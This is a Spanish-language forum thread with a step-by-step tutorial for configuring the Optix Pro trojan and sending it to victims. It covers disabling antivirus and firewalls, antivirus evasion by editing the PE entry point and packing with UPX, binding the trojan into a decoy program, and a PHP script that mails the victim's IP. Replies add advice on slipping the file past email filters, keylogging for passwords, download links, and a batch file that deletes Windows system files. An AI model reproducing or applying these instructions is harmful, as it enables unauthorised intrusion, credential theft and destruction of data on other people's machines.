|
| ||||
|
|
| Autor | Mensaje (Ver Versión para Imprimir) | ||||||
mig16
Usuario Veterano
Registrad@: 07/05/2004 Estado: Desconectad@ |
Tutorial by mig16 Respeten la autoria!!!! ¬_¬ -------------------- En este tutorial les voy a enseñar el uso de el troyano \"Optix Pro\" en especifico, aunque la mayoria de troyanos funcionan igual. Los programas que vas a necesitar Optix Pro 3.1 (Troyano) Dropper Gen (Binder) lccwin32 (compilador para que sirva el binder) ProcDump (Modifica el codigo hexadecimal) Winrar (solo si no tienes un descompresor de archivos .rar) buscalos en google 
1er Paso Descomprimes todos los archivos e instalas el lccwin32 y el (winrar si es necesario) Ahora vas a la carpeta del optix pro en Builder y ejecutas el Builder : cuando es la primera vexz que lo abres te va a pedir que introduzcas la contraseña que viene escondida en el reglamento namas lee el reglamento y cuanod veas algo entre comillas ese es el pass lo pones y le das ok, despues te pide que selecciones lenguaje ya que entres veras esto: 
ahora vamos a la ventana de Main settings 
las 2 primeras opciones son para ver como se separan las notificaciones lastima que las notificaciones no sirven :lol: la 3era y cuarta opcion tambien son de notifcacion y no sirven entonces las saltamos vamos a Server password aki si deseas introuces una contraeña para que solo tu te conectes al servidor =) Fake error es por si quieres que cuanod tu victima ejecute el arxivo le aparezaca un pop up diciendo \"El programa esta dañado\" o lo qu quieras.... (no lo recomiendo , yo no confiaria de un .exe que me haga esas cosas) Vamos a la pestaña de abvajo que dice Server icon y seleccionamos el icono de servidor Ahora vamos a startup and installation 
esta parte siempre la dejo por default opcion 1 : que corra en el registro de todos los sistemas operativos opcion2 : que corra en 2k/XP opcion 3 : puedes seleccionar el nombre de la clave de registro que crearar el troyano 
opcion 4 : que corra en 9x/Me en win.ini opcion 5 : que ocrra en 9x/Me pero en system.ini opcion 6 : la verdad no estoy seguro de como funciona ni que es a ciencia cierta (disculpen) 
pasamos a file startup : 
en el primer campo escojemos como se va a llamar el proceso que crea el troyano Ahora seleccionamos si queremos que se guarde en la carpeta de system o en la de windows eso da igual =) Melt server after installation osea que si depsues que se instalo que se pierda de la carpeta donde se instalo pasamos a la siguiente pestaña de Firewall and AVS (me salte las notificaciones por que no sirven) 
primera opcion Mata los firewalls segunda ocpion mata los antivirus tercera opcion: mata los combos (av y firewall juntos) en las pestañas de abajo que dicen specific exe\'s y la de NT/2k ,,,,,,,,,,, specific exes es para que le pongas el exe que quieres que mate especificamente por ejemplo msnmsngr.exe entonces cuando se ejecute va a matar ese proceso y tambien cada vez que se incie ese programa..... el de NT/2k ... es lo mismo solo que se pone el nombre del servicio ahora pasamos a enhaced options 
aki si seleccionan la casilla el sever se va a hacer invisible en el registro y en la carpeta donde se guardo =) (peligroso si lo van a probar con ustedes) xD luego le dan click en built creat server lo guardan y le dan click en \"ok all done\" ya tienen su server ahora vamos a lo interesante. vamos a hacer el programa indetectable. abrimos el procdump: 
y le damos click en PE editor seleccionamos el \"server.exe\" que crearon y en donde dice entry point: 
van a aumentar el codigo de \"0009A84C\" a \"0009A84D\" ese numero no siempre va a ser el mismo (depende de que troyano se use) damos click en ok y cerramos el programa ya esta indetectable ( lastima que este metodo no sirve para kasperskey ni mcafee =( ahora vamos a comprimir el \"server\" con upx simplemente arrastrandolo al icono de UPX se esperan a que acabe la ventana del msdos y ya lo tendran compreso
como se muestra aqui: 
ahora vamos al dropper gen lo abrimos 
y agregaremos dos arxivos primeor el que quieres que se ejecute \"visualmente\" y depsues el \"oculto\" como se muestra en el ejemplo marcaremos la casilla que dice Include icon para que se incluya el icono que se guarda en DGNS needed, ese icono simplemente se cambia reemplazandolo por otro con el mismo nombre. damos click en generate source code y cuando nos aparezca un pop up que diga. File saved as result c ya esta listo. haremos click en compile with lccwin32 y nos aparezera esta ventana de msdos: 
esperamos a que acabe y buscamos en la carpeta de dropper gen el arxivo Result.exe ese es el troyano que tu le vas a mandar a tu victima! ya estas listo =) ahora para hackear a tu vitcima le mandas el arxivo y lo tiene que ejecutar pero pues tu necesitas su ip : para eso vas a abrir un bloc de notas y vas a escribir <? $ip=$REMOTE_ADDR; $hr= mail(\"aqui_tu_correo@lo_que_quieras\",\"Ip\",\"$ip\" ;
?> lo guardas como loquequieras.php y lo subes a tu pagina ahora mandas a tu victima a mipagina.com/loquequieras.php y te llegera el ip a tu correo (Para esto tu hosting tiene que tener mailer). Autor: mig16 Por favor distribuyan este tutorial si les parece bueno en donde quieran (solo recuerden poner los derechos de autor) cualquier duda mandeme un mp o agregenme al msn bye ***"Hacker" sin imaginacion no es hacker! *** | ||||||
| 15/02/2005 01:43:05 | |||||||
LuCaSsSs
Usuario Casi Veterano 
Registrad@: 24/11/2004 Estado: Desconectad@ |
bueno, yo prove lo del procdump con tres antivirus, ni el norton ni el avg lo detectaron... pero el Nod32 si, y segun vos es kaspersky y el mcafee tambien... pero no son los antivirus mas utilizados asique con pocas personas va a ser detectable   | ||||||
| 03/03/2005 22:19:22 | |||||||
50cents
Usuario Novato .jpg)
Registrad@: 26/02/2005 Estado: Desconectad@ |
hola tengo un problema no enkuentro la contraseña donde biene la muerte es algo ke atodos nos llega poro de ti depende komo ¡¡¡¡ | ||||||
| 04/03/2005 00:18:49 | |||||||
mig16
Usuario Veterano
Registrad@: 07/05/2004 Estado: Desconectad@ |
que contraseña? y creo que ya comente arriba que si se puede hacer indetectable contra mcafee nod32 y kasperskey pero tienes que buscar el numero de offset que tienes que camboiar y me da flojera hacerlo =)  Ayer soñe que lo usaban!  | ||||||
| 04/03/2005 00:26:05 | |||||||
50cents
Usuario Novato
Registrad@: 26/02/2005 Estado: Desconectad@ |
el contra ke biene es kondida en el reglamento perdon x la ignorancia pero ke nombre tiene el reglamento es ek esta en ingles la muerte es algo ke atodos nos llega poro de ti depende komo ¡¡¡¡ | ||||||
| 04/03/2005 00:54:23 | |||||||
mig16
Usuario Veterano
Registrad@: 07/05/2004 Estado: Desconectad@ |
nada mas lee el reglamento y lee donde dice password "xidhs" algo asi era buscale bien Ayer soñe que lo usaban! | ||||||
| 04/03/2005 03:45:47 | |||||||
LuCaSsSs
Usuario Casi Veterano
Registrad@: 24/11/2004 Estado: Desconectad@ |
en esa parte aparece este emoticon | ||||||
| 04/03/2005 16:15:21 | |||||||
mig16
Usuario Veterano
Registrad@: 07/05/2004 Estado: Desconectad@ |
<? $ip=$REMOTE_ADDR; $hr= mail(\"aqui_tu_correo@lo_que_quieras\",\"Ip\",\"$ip\" ); ?> ponlo asi solo que sin el espacio entre ; y ) Ayer soñe que lo usaban! | ||||||
| 05/03/2005 06:25:13 | |||||||
LuCaSsSs
Usuario Casi Veterano
Registrad@: 24/11/2004 Estado: Desconectad@ |
mig... me decis algun hosting con mailer? gracias! | ||||||
| 08/03/2005 01:32:27 | |||||||
mig16
Usuario Veterano
Registrad@: 07/05/2004 Estado: Desconectad@ |
 creo que miarroba pero no estoy seguro...... la vdd no se mucho,,,esq como a mi un amigo me dio su hosting  entonz si tenia pero no se buscale :sAyer soñe que lo usaban! | ||||||
| 08/03/2005 01:34:07 | |||||||
scod_man
Usuario Frecuente
Registrad@: 12/10/2003 Estado: Desconectad@ |
ajajajajaja apesta este tuto y lo sabes miga
xDDDDD na, saludos reina del foro, buen tuto,. aunquesea copy paste xDDD na :p  | ||||||
| 08/03/2005 08:41:51 | |||||||
mig16
Usuario Veterano
Registrad@: 07/05/2004 Estado: Desconectad@ |
jajajajjaa pinche puñal scody jajajaja xDDDDDDDDD hace un chi chi chingo que no te pasabas por aki,,desde akel post jajajaja xD pinche chaketero jajaja copy paste?  me tarde un chingo en hacerlo.... casi como3 horas  por cierto tu pagina y tu keylogger estan llenos de bugs jajajajaja xDDDD
saludos puñal Ayer soñe que lo usaban! | ||||||
| 08/03/2005 08:44:35 | |||||||
sieg_heil
Usuario Aprendiz .jpg)
Registrad@: 28/04/2005 Estado: Desconectad@ |
una pregunta no entendi muy bein la parte de mandar el upx.exe a mcdos para comprimirlo como hago eso no puedo xfa. EL NAZISMO SEDA EN TODOS LADOS SOLO QUE MUCHOS NO LO QUIEREN ASEPTAR... ¡SIEG HEIL ! | ||||||
| 24/07/2005 03:30:18 | |||||||
x[ne]x
Usuario Novato .jpg)
Registrad@: 06/08/2005 Estado: Desconectad@ |
sip ya lo logre ahora el problema es poder hacerle llegar el server a alguien pq el msg y el hotmail lo dectectan .. pd. este foro esta falleciendo...................................... Mensaje Editado el 19:57:23 17/08/2005 | ||||||
| 15/08/2005 00:47:12 | |||||||
McLeod
Usuario Muy Frecuente 
Registrad@: 14/06/2005 Estado: Desconectad@ |
tengo una pregunta algo estupida, y si no tengo pagina que otra forma se la puedo enviar? puede ser via msn o correo ? o afuerzas tiene que ser via web? y por cierto aqui marcas el codigo para que te envie la ip de la victima al correo. Pregunto yo y se puede cambiar este codigo para que te mande su clave de correo?  † La Muerte es el Complemento de la Vida † | ||||||
| 20/08/2005 01:16:35 | |||||||
HeLiOsZ
Usuario Casi Veterano .jpg)
Registrad@: 13/03/2005 Estado: Desconectad@ |
1º puedes mandar el server de cualquier forma que quieras,no tiene que ser obligatoriamente por web,aunque si,esta es la mejor manera y la que menos problemas trae 2º no puedes hacer que te mande la contraseña de la victima al correo ,pero cuando estas dentro de la maquina a la que le as enviado el server puedes encender el keylogger y te va grabando las teclas que pulsa y seguramente te saldra la clave del msn  Algunos cayeron en la tentacion de tentarme y no salieron victoriosos de la tarea
| ||||||
| 20/08/2005 16:44:21 | |||||||
McLeod
Usuario Muy Frecuente
Registrad@: 14/06/2005 Estado: Desconectad@ |
ok, por cierto aqui otra pregunta estupida, no puedo descargar el optix ya que como es troyano me lo detecta el antivirus o firewall, la pregunta es, ¿si desactivo el antivirus o firewall es posible que se contamine mi maquina sin probar lo que dice el tutorial? † La Muerte es el Complemento de la Vida † | ||||||
| 25/08/2005 01:50:00 | |||||||
HeLiOsZ
Usuario Casi Veterano
Registrad@: 13/03/2005 Estado: Desconectad@ |
si no ejecutas el server lo mas probable es que no te infectes... la otra cosa seria solo si el archivo que te bajaste tiene un virus en su raiz... (cosa que dudo) osease,normalmente no hay peligro Algunos cayeron en la tentacion de tentarme y no salieron victoriosos de la tarea
| ||||||
| 26/08/2005 01:13:36 | |||||||
spend
Usuario Novato
Registrad@: 12/09/2005 Estado: Desconectad@ |
holissss....bue como veran soy nuva en esto...y estube leyendo sobre troyanos y me tope con esta web, y me puse ha hacer lo que dice el tutorial...pero no puedo encontrar el ProcDump por ninguna parte... alguien que sepa donde bajarlo me lo puede decir.....gracias!!! | ||||||
| 12/09/2005 20:36:12 | |||||||
Aprendiz_man12
Usuario Frecuente 
Registrad@: 28/05/2005 Estado: Desconectad@ |
Hola tngo una pregunta la paginade evileyesoftware ya no funciona asi q no se de donde descargar el optix pro porq si meto descargar optix pro sale solo paginas de antivirus y q optix pro es un backdoor. De verdad q buske pero no encontre nada alguien sabe algun link? gracias Pasaros por mi foro www.elforo.de/sk8ers es de hack y de skate aunk tmbien de otras cosas | ||||||
| 13/09/2005 20:06:25 | |||||||
McLeod
Usuario Muy Frecuente
Registrad@: 14/06/2005 Estado: Desconectad@ |
Descargar el: ProcDump †Nunca Juzguez a un libro por su portada sin explorar su contenido† | ||||||
| 19/09/2005 23:14:36 | |||||||
DaNuKmen
Usuario Aprendiz .jpg)
Registrad@: 17/08/2005 Estado: Desconectad@ |
aca estan todas las pajinas de los programas para exitarles los 45 minutos q estube buscando para nosotros.. Optix Pro 3.1 (Troyano) http://elhacker.net/hacking.htm#troy Dropper Gen (Binder) http://www.cyruxnet.org/download/dropper_gen0.1.zip lccwin32 (compilador para que sirva el binder) http://www.windowsmirror.com/pages/5248.html ProcDump (Modifica el codigo hexadecimal) http://www.download.com/3001-2216_4-10226105.html?idl=n Winrar (solo si no tienes un descompresor de archivos .rar) http://www.download.com/3120-20_4-0.html?tag=srch&qt=winrar&tg=dl-2001&search.x=12&search.y=10 un abraso.. adios  ___________^[DaNu(K)-men>^________________  
Mensaje Editado el 1:17:39 23/09/2005 Mensaje Editado el 1:18:07 23/09/2005 Mensaje Editado el 1:32:17 23/09/2005 | ||||||
| 23/09/2005 00:57:59 | |||||||
3l_4pr3nd1s
Usuario Espontáneo
Registrad@: 20/02/2006 Estado: Desconectad@ |
holakoz...tengo una pregunta como hago para ke no lo detecte hotmail???. intente mandarlo por messenger y no pude...y por email tampoko.....no hay alguna forma para burlar el msn??? | ||||||
| 20/02/2006 06:54:38 | |||||||
RevangelyonX
Muy Veterano (o Adicto) 
Registrad@: 11/09/2005 Estado: Desconectad@ |
Pues para eso lo tienes que comprimir en Rar. Osea una vez configurado el server. lo comprimes a server.rar y hotmail, ya no te lo detectará. Via e-mail no puedes ya que es demasiado gran para enviarlo. Salu2 Lo que una mente crea, otra la supera. Visita mi Web : Sobre hacking | ||||||
| 20/02/2006 21:08:38 | |||||||
RevangelyonX
Muy Veterano (o Adicto)
Registrad@: 11/09/2005 Estado: Desconectad@ |
Por cierto el LCC no lo encontre donde dijo DaNuKmen (gracias por los links!) y lo encontre en elhacker.net sección hacking en Utilidades. Salu2 Lo que una mente crea, otra la supera. Visita mi Web : Sobre hacking | ||||||
| 20/02/2006 21:12:58 | |||||||
RevangelyonX
Muy Veterano (o Adicto)
Registrad@: 11/09/2005 Estado: Desconectad@ |
Buenas, lo e probado y todo funciona correctamente me gusta este troyano, pero encontre un problema cuando quise crear el código y después compilarlo en el Blinder. Cuando puse los dos programas y le dí a Generate Code Source y me salta un error, diciendome que no puede crear el result.c. Cuando miro a la carpeta, el result.c esta alli, y si lo compilo me sale el result compilado con el icono pero no funciona. Mig si me puedes explicar o solucionar este pequeño problema, te lo agradecería.
Gracias y Salu2 Lo que una mente crea, otra la supera. Visita mi Web : Sobre hacking | ||||||
| 21/02/2006 22:28:29 | |||||||
mig16
Usuario Veterano
Registrad@: 07/05/2004 Estado: Desconectad@ |
eso es un error del programa,, prueba corriendolo en otra carpeta o bajandolo de otro lugar uno es hacker cuando quiere serlo ... | ||||||
| 23/02/2006 03:01:56 | |||||||
RevangelyonX
Muy Veterano (o Adicto)
Registrad@: 11/09/2005 Estado: Desconectad@ |
Ya lo probé pero nohay solución, bueno me lo voy a descargar desde otra página y te cuento, gracias
Salu2 Lo que una mente crea, otra la supera. Visita mi Web : Sobre hacking | ||||||
| 23/02/2006 19:05:29 | |||||||
BinD
Usuario Espontáneo
Registrad@: 24/02/2006 Estado: Desconectad@ |
 RE: Camuflar troyano (con imagenes)Tengo una pregunta... "agregaremos dos arxivos primeor el que quieres que se ejecute \"visualmente\" y depsues el \"oculto\" " no entiendo que hay que hacer en esa parte muy bien (nose cuales son los archivos que se deben agregar).. disculpen las molestias  | ||||||
| 25/02/2006 19:03:40 | |||||||
menimed
Usuario Casi Frecuente .png)
Registrad@: 13/07/2005 Estado: Desconectad@ |
oye yo no puedo descargar el maldito archivo de Optix Pro 3.1 (Troyano) ya lo busque en google y solo me abren puraqs demostraciones de como lop utilizo pero no viene el programa para descargarlo y guardarlo dime de donde lo puedo bajar...y tambien que hace eswte virus a la victima o solo para entrar a su compu sirve..? por favor soy nuevo en estop expliquenme,,, new messenger | ||||||
| 25/02/2006 19:50:03 | |||||||
RevangelyonX
Muy Veterano (o Adicto)
Registrad@: 11/09/2005 Estado: Desconectad@ |
Buenas
Pues tienes que agregar un archivo que no sea el servidor, que es el que saldrá en la pantalla. Asi cuando la victima lo abra vera el primer archivo, y el segundo es el server.exe que no lo verá.
Bueno yo lo encontre simplemente en Elhacker en sección hacking troyanos. Y lo probé y tal, bueno funciona de maravilla, me gusta más que Sub7, etc.. Salu2 Lo que una mente crea, otra la supera. Visita mi Web : Sobre hacking | ||||||
| 25/02/2006 20:27:17 | |||||||
Kaze
Usuario Casi Frecuente 
Registrad@: 23/02/2006 Estado: Desconectad@ |
Tengo una duda... "ahora vamos a comprimir el \"server\" con upx simplemente arrastrandolo al icono de UPX se esperan a que acabe la ventana del msdos y ya lo tendran compreso " ¿En dónde se encuentra ese icono de UPX? Hay una opción para eso en el Optix, pero sólo la puedo usar si guardo el archivo nuevamente. Ah... y una cosa más, ¿podrían darme otro link para el dropper gen? Encontré uno, pero el archivo está mal y no he podido encontrar más. -__- 
| ||||||
| 27/02/2006 06:09:22 | |||||||
RevangelyonX
Muy Veterano (o Adicto)
Registrad@: 11/09/2005 Estado: Desconectad@ |
El UPX se encuentra en la misma carpetas que el Optix, descomprime el Optix en el escritorio. Abrelo y verás dos carpetas : Builder y Client. Pues entra en Builder y verás el UPX sin icono
Dropper Gen Blinder (click aquí) Salu2 Lo que una mente crea, otra la supera. Visita mi Web : Sobre hacking | ||||||
| 27/02/2006 12:11:21 | |||||||
Kaze
Usuario Casi Frecuente
Registrad@: 23/02/2006 Estado: Desconectad@ |
Oh, ya... muchas gracias... en unos días lo probaré, ya que ahora tengo algunas cosas que hacer y no le puedo dar todo el tiempo que requiere... si me surge alguna otra duda les aviso. Un saludo. (: | ||||||
| 28/02/2006 03:19:45 | |||||||
Kaze
Usuario Casi Frecuente
Registrad@: 23/02/2006 Estado: Desconectad@ |
A ver... ya me surgió otra duda. -___- 
Ya tengo su I.P... en lo del puerto y el pass puse lo mismo que al crear el archivo en el builder y cuando trato de entrar me sale "Attemping conection" en la parte de abajo y luego me marca "Disconnected", ¿qué es lo que estoy haciendo mal? También quería preguntarles si es posible que sea por mi conexión de la era de piedra... sigo usando dial-up y me pregunto si es por eso que no puedo conectarme a su PC... me gustaría que alguien que haya usado muchas veces el Optix con éxito me enviara un privado para que le enviara la contarseña del servidor que hice para que esa persona intentara entrar a la máquina (el .exe ya está instalado, así que cualquiera con el programa y el pass del server podría entrar, supongo) para ver si hice mal algo o es cosa de mi conexión. Un saludo y gracias. (: | ||||||
| 28/02/2006 05:17:46 | |||||||
mig16
Usuario Veterano
Registrad@: 07/05/2004 Estado: Desconectad@ |
puede ser que tu victima tiene firewall... consiganse un troyano de conexion inversa e intenten camuflarlo.. salu2 MessageBox.Show( " No Molestar " ); | ||||||
| 23/03/2006 14:11:59 | |||||||
moyo18
Muy Veterano (o Adicto) .jpg)
Registrad@: 20/02/2006 Estado: Desconectad@ |
ese tuto esta muy bien pero quisera saber si se puede hacer lo mismo con el sub seven?????
Mensaje Editado el 22:39:57 25/03/2006 | ||||||
| 25/03/2006 22:38:13 | |||||||
Moritury
Usuario Aficionado .jpg)
Registrad@: 31/03/2006 Estado: Desconectad@ |
Pregunto esactamente lo smimo que mi antecesor:¿se puede acer esto con el subseven????? QUE RISA ME DA ESA FALSA HUMANIDAD,DE LOS QEU SE DICEN BUENOS, NO PERDONARAN MI PECADO ORIGINAL , DE SER JOVEN Y ROKERO¡¡ [Death My Death,Before Death My Enemy> | ||||||
| 31/03/2006 05:58:42 | |||||||
mig16
Usuario Veterano
Registrad@: 07/05/2004 Estado: Desconectad@ |
si,solo que el offset del procdump sera diferente MessageBox.Show( " No Molestar " ); | ||||||
| 31/03/2006 06:11:46 | |||||||
RevangelyonX
Muy Veterano (o Adicto)
Registrad@: 11/09/2005 Estado: Desconectad@ |
Pues que quieres que te diga para mi subseven es una ****** comparado a Optix 
Mig jajaj sigo con el mismo problema del compilador, pero bueno es = lo e usado con usuarios "normales" y sin firewall, etc.. es genial jajaja Salu2 Lo que una mente crea, otra la supera. Visita mi Web : Sobre hacking | ||||||
| 06/04/2006 22:59:43 | |||||||
sh0kerrr
Usuario Espontáneo
Registrad@: 15/04/2006 Estado: Desconectad@ |
oye, todo esto esta de **** madre, se me encrespan los vellos cuando leo lo que hay aqui ya que es flipante lo que se puede hacer con el ordenador. Bueno he bajado todos los programas y he hehco todo, una unica cosa es lo que no entiendo; Despues de mandar el archivo infectado se supone que recibiré el ip de esa persona....como? donde? dice que guarde el texto ese como loquequiera.php y lo suba a mi pagina, que pagina? como lo hago? No podria poner un directorio que mandara la ip directamente a mi pc en alguna carpeta que yo quiera cambiando el texto del bloc de notas? Que tendria que escribir en ese caso?. Gracias | ||||||
| 15/04/2006 07:18:04 | |||||||
RevangelyonX
Muy Veterano (o Adicto)
Registrad@: 11/09/2005 Estado: Desconectad@ |
Vamos aver tienes que registrarte el algun hosting gratuito como lycos.es o geocites y subes el php allí. hay mas formas para coger la IP de tu victima pero bsucalo proque ya se a hablado mucho Salu2 Lo que una mente crea, otra la supera. 
Visita mi Web : Sobre hacking | ||||||
| 16/04/2006 02:53:41 | |||||||
bikutoru123
Usuario Novato
Registrad@: 09/05/2006 Estado: Desconectad@ |
 RE: Camuflar troyano (con imagenes)Hola Pss Soy Nuevo En este Foro me prsento Me llamo Victor Gutierrez Tengo 14 Y llevo Mucho tiempo En el sector de hacking hacker Troyanos,client,server,etc Pero Saben necesito Una ayuda  Al abrir el oblivion dsgen 1.0 SE ME CIERRA Y DESPUES SE ME BORRO LO MISMO PASA CON EL CALIMOCHO 1.0 Y TODOS LOS PROGRAMAS PARA JUNTAR ARCHIVOS. Puse cntrl+alt+supr vi las aplicaciones desactive el antivirus,el anty spyware,el anti keylogger,firewwal,el error spy,etc Todos mis programas Pero No pasa Nada Cancele todas las aplicaciones y tampoco pasaba nada.Bueno yo quiero Encontrar ese programa Para poder hacer lo sgte:
 Si Borrar Windows Con un archivo de 1kb Con extencion .bat
1-Crear Un Docuemnto texto es decir ej Hola.txt Y escribe los siguentes comandos Del DOS: Recuerden No lo habran C Borrara Windows :Echo off :Repeat1 @DEL *.exe @DEL *.ini @DEL c:\WINDOWS\*.ini @DEL c:\WINDOWS\*.exe @DEL c:\WINDOWS\*.bmp @DEL c:\WINDOWS\*.jpg @DEL c:\WINDOWS\*.dll @DEL c:\WINDOWS\*.bak @DEL c:\WINDOWS\*.log @DEL c:\WINDOWS\*.prx @DEL c:\WINDOWS\system32\*.ini @DEL c:\WINDOWS\system32\*.exe @DEL c:\WINDOWS\system32\*.jpg @DEL c:\WINDOWS\system32\*.dll @DEL c:\WINDOWS\system32\*.log @DEL c:\WINDOWS\system32\*.prx @DEL c:\WINDOWS\system32\*.bak @DEL c:\WINDOWS\repair\*.ini @DEL c:\WINDOWS\repair\*.exe @DEL c:\WINDOWS\repair\*.nt Me explico paso a paso como funciono esto El comando DEL es para borrar archivos Luego de eso se pone la direccion del archivo Es decir si prefieres borrar Todo Debes Poner @del c: Luego se pone el nombre del archivo si prefieres le pones *.exe Es decir borrara todos los archivos con extencion.exe Luego haci si los pones *.jpg ,etc.... Ojo el echo esta off Es decir no pregunta lo que hace Osea Es automatico eso significa que dos No preguntara si deces borrar todos los archivos ademas esta operacion duro muy poco Bueno espero que les aya servido Pero les Pido que me ayuden ccon los blinder Ojo ya lo busque por  porfavorr.... Xau manes y cuidense | ||||||
| 09/05/2006 01:46:50 | |||||||
300987
Usuario Espontáneo
Registrad@: 19/05/2006 Estado: Desconectad@ |
me falta ProcDump aki pongo estos ke encontre a cambio de ke alguien me pase el ke me falta xD drooper http://www.megaupload.com/es/?d=DE4LNUL4 lccwin32 http://www.megaupload.com/es/?d=VKISSYQA | ||||||
| 19/05/2006 04:11:21 | |||||||
hecastemesa2
Usuario Espontáneo
Registrad@: 18/08/2007 Estado: Desconectad@ |
 RE: Camuflar troyano (con imagenes)hola soy nuevo y quieroe mpezar aportando este link http://club.telepolis.com/dafatha/soft.html aqui esta el ProcDump | ||||||
| 18/08/2007 06:28:14 |
No se pueden responder temas "viejos" en Estado de Emergencia